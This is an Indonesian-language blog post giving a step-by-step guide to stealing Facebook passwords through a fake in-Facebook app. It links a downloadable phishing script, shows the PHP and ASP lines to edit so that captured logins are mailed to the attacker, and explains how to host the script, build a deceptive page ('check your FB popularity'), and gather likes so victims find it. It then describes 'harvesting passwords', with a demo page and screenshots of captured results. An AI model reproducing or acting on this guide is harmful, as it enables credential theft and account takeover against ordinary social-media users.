Cara Hack Facebook Via Facebook

Cara Hack Facebook Via Facebook






Facebook, sapa sih yang gak kenal Facebook??? Salah satu situs jejaring sosial terbesar selain Friendster dan Twitter. Facebook dikenal karena kemudahan dan tentunya keamanannya.

Aman?? 100%?? hem..tidak ada yang sempurna.. banyak para hacker yang berusaha menembus pertahanan Facebook, seperti yang dilakukan team inj3ct0r yang menggunakan tehnik SQL pada salah satu Apps yang ada di Faceboook. Tehnik lain?? hem..saat ini lebih banyak menggunakan Social Enginering seperti tehnik Pishing,Poisoning Attack pada satu jaringan,Fake Login dll.

Disini saya akan membahas salah satu tehnik Social Enginering yaaa semacam fake login tapi menggunakan fasilitas Facebook itu sendiri.Maksudnya??maksudnya adalah kita membuat halaman palsu berupa apps di dalam Facebook tersebut.
Tata cara nya sebagai berikut:

1. Download scriptnya dulu http://www.mediafire.com/?448qgmyux5o2mb8 atau http://idws.us/jjfjdc
2. Cari server gratisan atau injekkan yang support .PHP ( tanya om Google ) atau .ASP ( http://www.jabry.net )
3. Facebook tentunya
Mulai pembuatannya deh :
Sudah disiapkan scriptnya?? kalau sudah, ubahlah di bagian yang saya tandai menjadi alamat e-mail anda

.PHP  Code:
mail(
"youremailaddress@domain.com",

.ASP Code:
Mailer.RemoteHost = "smtp.yourhost.com"
Mailer.AddRecipient "your name", "youremailaddress@host.com"
lalu upload ke server anda..dan tugas pertama kita selesai. :)

[Image: sshot6j.jpg]
Lalu masuk ke http://www.facebook.com/pages/create dan pilih "Perjuangan atau Komunitas" lalu masukkan nama halaman anda.
Disini dituntut kepandaian kita mengolah kata agar berkesan menarik. Contoh "Cek Kepopuleran FB Anda" dan selesaikan langkah yang di anjurkan.
Kalau udah punya Logo buat halaman kita lebih bagus lagi sekalian kita upload disana. Kalau udah di kolom "Alamat Web" kita isi http://www.facebook.com/ lalu selesai deh.
Saatnya kita masuk ke http://www.facebook.com/add.php?api_key=...1e44&pages dan kita pilih "aplikasi" lalu kita pilih "Go To Apps" dan masukkan kode FBML yang sudah didownload tadi.
Jangan lupa di bagian yang bertuliskan "http://yourwebsite.com/facebook.php" diganti Url tempat kita mengupload file Facebook.php tadi...dan klik "Save". selesai sudah tugas ke 2 kita. Lihat gambar dibawah ini

[Image: sshot7y.jpg]

Terakhir, kita share halaman yang udah kita buat tadi, lalu minta teman - teman kita buat meng-klik tombol "Like" usahakan minimal 25 orang yang nge-like. Jadi kita bisa membuat "username" untuk halaman kita, misal jadi "http://www.facebook.com/pagechecker" dan berharap orang-orang mencoba aplikasi kita, lalu boom..panen password deh....cek folder spam di server e-mail kita.

Kalau mau liat hasilnya ni ada halaman demonya,tapi jangan coba-coba masukkin password asli ya..he he he
DEMO
http://www.facebook.com/pages/Cek-Harga-...4949752878
tampilan kalau ada yang coba nih halaman kaya gini..

[Image: sshot3e.jpg]
[Image: sshot4g.jpg]
Dan hasilnya akan terekam dengan baik di e-mail yang udah kita setting tadi...he he he

[Image: sshot5e.jpg]


Leave a Reply

    Blogger news

    free counters

    About